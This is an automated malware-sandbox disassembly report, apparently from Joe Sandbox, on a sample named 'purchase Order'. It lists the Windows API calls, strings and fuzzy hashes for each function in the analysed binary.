                                                        • Instruction ID: ee229e1d2ea38ea946b2d480abaa09adf97174763a639961c37b7de6967fdd8d
                                                        • Opcode Fuzzy Hash: 150fb007b16010eec1e554d75c2948e299d294d56000e0e4dece848e692e0cc0
                                                        • Instruction Fuzzy Hash: C541AF39000144AFDB305F28DC89BBD3B66AB46732F188265FD768A1E6D7308D86DB25
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                        • String ID:
                                                        • API String ID: 136442275-0
                                                        • Opcode ID: 9e71ac82b8626119f7251e35f42376d7bdc9f516ed1ac60ea6892e90add5a56f
                                                        • Instruction ID: 9c88afb36cd9790631c81364b6fc0392b536303bfb019205832e7a6c25c763c2
                                                        • Opcode Fuzzy Hash: 9e71ac82b8626119f7251e35f42376d7bdc9f516ed1ac60ea6892e90add5a56f
                                                        • Instruction Fuzzy Hash: 1D411D7688521CAECF65EB94CC85DDB73BCEB44300F1041A6B659A2051EB30ABE59F54
                                                        APIs
                                                        • CharLowerBuffW.USER32(00CDDC00,00CDDC00,00CDDC00), ref: 00C8D7CE
                                                        • GetDriveTypeW.KERNEL32(?,00CF3A70,00000061), ref: 00C8D898
                                                        • _wcscpy.LIBCMT ref: 00C8D8C2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 53bac0397bce31d0ede19f2747eac1478d0f9be9e593a304c0136ee38ebfabbd
                                                        • Instruction ID: 9bbaf9598273f64c7b32f54ce430d9f8102a6f8f865448150f9216ec1634a4a9
                                                        • Opcode Fuzzy Hash: 53bac0397bce31d0ede19f2747eac1478d0f9be9e593a304c0136ee38ebfabbd
                                                        • Instruction Fuzzy Hash: A3519F35104244AFC704FF14D881A6EB7A5EF85318F10882DF9AA572E2DB31EE49DB86
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CAB3F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: @U=u
                                                        • API String ID: 634782764-2594219639
                                                        • Opcode ID: 4044ce4a1622e550f3867abce1d101ebf66c8344d28436bfb6e9f85497667fdb
                                                        • Instruction ID: 33b46e2563aaaa5c673e7f84ad9334b9af3bc3edc07541baffe7ab096f6ecdcb
                                                        • Opcode Fuzzy Hash: 4044ce4a1622e550f3867abce1d101ebf66c8344d28436bfb6e9f85497667fdb
                                                        • Instruction Fuzzy Hash: 05518F34501206BEEF209F29CD89BAD3B64AF0631CF644515FA25D62E3CB71EE909B51
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00CBDB1B
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CBDB3C
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CBDB51
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00CBDB6E
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CBDB95
                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C5A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00CBDBA0
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CBDBBD
                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C5A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00CBDBC8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 1268354404-2594219639
                                                        • Opcode ID: 380ceed0a84cb53fc92e727a0dcf6ed00bf9347558378eb043d14b035eb95575
                                                        • Instruction ID: 6306bc2e398759ae538ac224cc3bd255c74b0e6080521d4a59515d72db317e62
                                                        • Opcode Fuzzy Hash: 380ceed0a84cb53fc92e727a0dcf6ed00bf9347558378eb043d14b035eb95575
                                                        • Instruction Fuzzy Hash: 76518B74600309EFDB24DF2ACC81FAA77B8FB08751F100628F95697290EBB0AD84DB54
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00C493AB
                                                        • __itow.LIBCMT ref: 00C493DF
                                                          • Part of subcall function 00C61557: _xtow@16.LIBCMT ref: 00C61578
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf_xtow@16
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 1502193981-2263619337
                                                        • Opcode ID: 9e38ff227ee12bc15c8cc3f20a90eaf952005fa2c8caedde651a0f18babe2b60
                                                        • Instruction ID: 528035f7ad7004f9a1356d7de0c9190c8b07a41e021ee30db0d736a902e54120
                                                        • Opcode Fuzzy Hash: 9e38ff227ee12bc15c8cc3f20a90eaf952005fa2c8caedde651a0f18babe2b60
                                                        • Instruction Fuzzy Hash: 2241E531508214ABDB28DF74D982EBAB7E8FF45300F24446EE55AD71D2EA31DA41DB11
                                                        APIs
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C7B98C
                                                        • GetDlgCtrlID.USER32 ref: 00C7B997
                                                        • GetParent.USER32 ref: 00C7B9B3
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C7B9B6
                                                        • GetDlgCtrlID.USER32(?), ref: 00C7B9BF
                                                        • GetParent.USER32(?), ref: 00C7B9DB
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C7B9DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 1383977212-2258501812
                                                        • Opcode ID: 60702db41601b39a251b9521676225272f6572223b088378e6975f62c821ff41
                                                        • Instruction ID: 3615eb0e373e6ad2578d2930546fa741b7b906a981fad88e2f3a00860b2c37f4
                                                        • Opcode Fuzzy Hash: 60702db41601b39a251b9521676225272f6572223b088378e6975f62c821ff41
                                                        • Instruction Fuzzy Hash: B421C5B5900108BFDB04ABA4CC86FFEBB79EF49310F104129F666932E1DB749915EB20
                                                        APIs
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C7BA73
                                                        • GetDlgCtrlID.USER32 ref: 00C7BA7E
                                                        • GetParent.USER32 ref: 00C7BA9A
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C7BA9D
                                                        • GetDlgCtrlID.USER32(?), ref: 00C7BAA6
                                                        • GetParent.USER32(?), ref: 00C7BAC2
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C7BAC5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 1383977212-2258501812
                                                        • Opcode ID: ffe670861b6681f96f319e9a51988a1831a18a24fab2385f09d654aad68ac2db
                                                        • Instruction ID: 7c4e1bc9c561abcc04130cf8d644d0f1374db86647d63b4e6a602b24fceab611
                                                        • Opcode Fuzzy Hash: ffe670861b6681f96f319e9a51988a1831a18a24fab2385f09d654aad68ac2db
                                                        • Instruction Fuzzy Hash: E72192B4A40208BFDB41ABA4CC85FFEBB79EF45300F104025F956A71A1DB75991AEB20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 2620052-3771769585
                                                        • Opcode ID: 019750649c01fd7b00ce5d391a4004aef3c00d9808d2a19e35a5303c1e5c7e0d
                                                        • Instruction ID: 433754fecd897f88d927ca93605e591136451377ace6c8446059d414fa0dabf1
                                                        • Opcode Fuzzy Hash: 019750649c01fd7b00ce5d391a4004aef3c00d9808d2a19e35a5303c1e5c7e0d
                                                        • Instruction Fuzzy Hash: B0112431908114ABCB25BBB0EC4AFDE77ACEF40714F100175F216A2081EF70DA859B54
                                                        APIs
                                                        • GetParent.USER32 ref: 00C7BAE3
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00C7BAF8
                                                        • _wcscmp.LIBCMT ref: 00C7BB0A
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C7BB85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-1428604138
                                                        • Opcode ID: 51c17f2f393a8b1e5a2ce454afaf4007dcb95b40e6abdfae74e0a11db4f45545
                                                        • Instruction ID: ba9634e8d0b1d28b52beb5f7fa58d1418e580d7ea930039f51c478dee213ce97
                                                        • Opcode Fuzzy Hash: 51c17f2f393a8b1e5a2ce454afaf4007dcb95b40e6abdfae74e0a11db4f45545
                                                        • Instruction Fuzzy Hash: 4E110276648307FBFA206635EC07FBB779C9B11724B204032FE19E50D9EBA1AD11A515
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C65047
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        • __gmtime64_s.LIBCMT ref: 00C650E0
                                                        • __gmtime64_s.LIBCMT ref: 00C65116
                                                        • __gmtime64_s.LIBCMT ref: 00C65133
                                                        • __allrem.LIBCMT ref: 00C65189
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C651A5
                                                        • __allrem.LIBCMT ref: 00C651BC
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C651DA
                                                        • __allrem.LIBCMT ref: 00C651F1
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C6520F
                                                        • __invoke_watson.LIBCMT ref: 00C65280
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                        • Instruction ID: 4799bd4b58b89f5f75c93c6b36c6716f874ee729ded888da09718ada26c70619
                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                        • Instruction Fuzzy Hash: 9671D872A00F17ABD7349E79CCD1B5A73A8AF01764F248229F924D7681E770DE409BD0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C84DF8
                                                        • GetMenuItemInfoW.USER32(00D01708,000000FF,00000000,00000030), ref: 00C84E59
                                                        • SetMenuItemInfoW.USER32(00D01708,00000004,00000000,00000030), ref: 00C84E8F
                                                        • Sleep.KERNEL32(000001F4), ref: 00C84EA1
                                                        • GetMenuItemCount.USER32(?), ref: 00C84EE5
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00C84F01
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00C84F2B
                                                        • GetMenuItemID.USER32(?,?), ref: 00C84F70
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C84FB6
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C84FCA
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C84FEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: 96d17b6db35fa7346c9ba203aa89d23cabc2e172d7285263017288efd0fb8d0a
                                                        • Instruction ID: 75bc23d2b3f96a6cc3448d43dbaab58f5d23c4c8a43dbe5501dcda2fae255063
                                                        • Opcode Fuzzy Hash: 96d17b6db35fa7346c9ba203aa89d23cabc2e172d7285263017288efd0fb8d0a
                                                        • Instruction Fuzzy Hash: 7361AFB190024AAFDB25EFA4DC88EAEBBB8FB0530CF14005DF552A7251D770AE45DB24
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CA9C98
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CA9C9B
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00CA9CBF
                                                        • _memset.LIBCMT ref: 00CA9CD0
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CA9CE2
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CA9D5A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 156618a2ffcbf7dd3a7a303f541ca0473e0717353de0c4ca1b137aa8313db9c6
                                                        • Instruction ID: c6e32dec3c61f2fbd76b69206c269a9c1adc1f7f7001173081be67932d47da25
                                                        • Opcode Fuzzy Hash: 156618a2ffcbf7dd3a7a303f541ca0473e0717353de0c4ca1b137aa8313db9c6
                                                        • Instruction Fuzzy Hash: 7C617C75900209AFDB10DFA4CC82FEEB7B8EB09718F144159FA19E7291D770AA41DB60
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00C794FE
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00C79549
                                                        • VariantInit.OLEAUT32(?), ref: 00C7955B
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C7957B
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00C795BE
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C795D2
                                                        • VariantClear.OLEAUT32(?), ref: 00C795E7
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00C795F4
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C795FD
                                                        • VariantClear.OLEAUT32(?), ref: 00C7960F
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C7961A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: ec5f9685bc7acc31ac0d61597050cc54b6ac40c7222834afa5b9a30320f3e2a4
                                                        • Instruction ID: 0f6c4e0a809fbeb0ee865afa6616529a4682485b208487f1c396a55e36fb8999
                                                        • Opcode Fuzzy Hash: ec5f9685bc7acc31ac0d61597050cc54b6ac40c7222834afa5b9a30320f3e2a4
                                                        • Instruction Fuzzy Hash: 6C413D35900219AFCB05EFA4D888EDEBBB9FF48355F008065F916A3251DB30EA45DBA1
                                                        APIs
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                        • CoInitialize.OLE32 ref: 00C9ADF6
                                                        • CoUninitialize.OLE32 ref: 00C9AE01
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00CCD8FC,?), ref: 00C9AE61
                                                        • IIDFromString.OLE32(?,?), ref: 00C9AED4
                                                        • VariantInit.OLEAUT32(?), ref: 00C9AF6E
                                                        • VariantClear.OLEAUT32(?), ref: 00C9AFCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: 06cd83eb8cbe9efb9cb5df89d3f7c9e3577e0e0bc98f12ee4934c9a88222f2ca
                                                        • Instruction ID: 27752b34fada0c5505d9f6cc402ee9ad1a2be749645cc1f195b6d001dd8ee79e
                                                        • Opcode Fuzzy Hash: 06cd83eb8cbe9efb9cb5df89d3f7c9e3577e0e0bc98f12ee4934c9a88222f2ca
                                                        • Instruction Fuzzy Hash: C2617A71208311AFDB10DF54C848B6EBBE8AF89714F104419F9869B2A1C770EE48CBD7
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00C5CC15
                                                          • Part of subcall function 00C5CCCD: GetClientRect.USER32(?,?), ref: 00C5CCF6
                                                          • Part of subcall function 00C5CCCD: GetWindowRect.USER32(?,?), ref: 00C5CD37
                                                          • Part of subcall function 00C5CCCD: ScreenToClient.USER32(?,?), ref: 00C5CD5F
                                                        • GetDC.USER32 ref: 00CBD137
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CBD14A
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00CBD158
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00CBD16D
                                                        • ReleaseDC.USER32(?,00000000), ref: 00CBD175
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CBD200
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: @U=u$U
                                                        • API String ID: 4009187628-4110099822
                                                        • Opcode ID: 707729a9df99fe5dec1179557edcc3c5766f54dcf32e0257e4cf257c39919ed8
                                                        • Instruction ID: c7e2526f12219e264f0c668ec039cdb7d203404253f36e81bf4ae6c74263ca5a
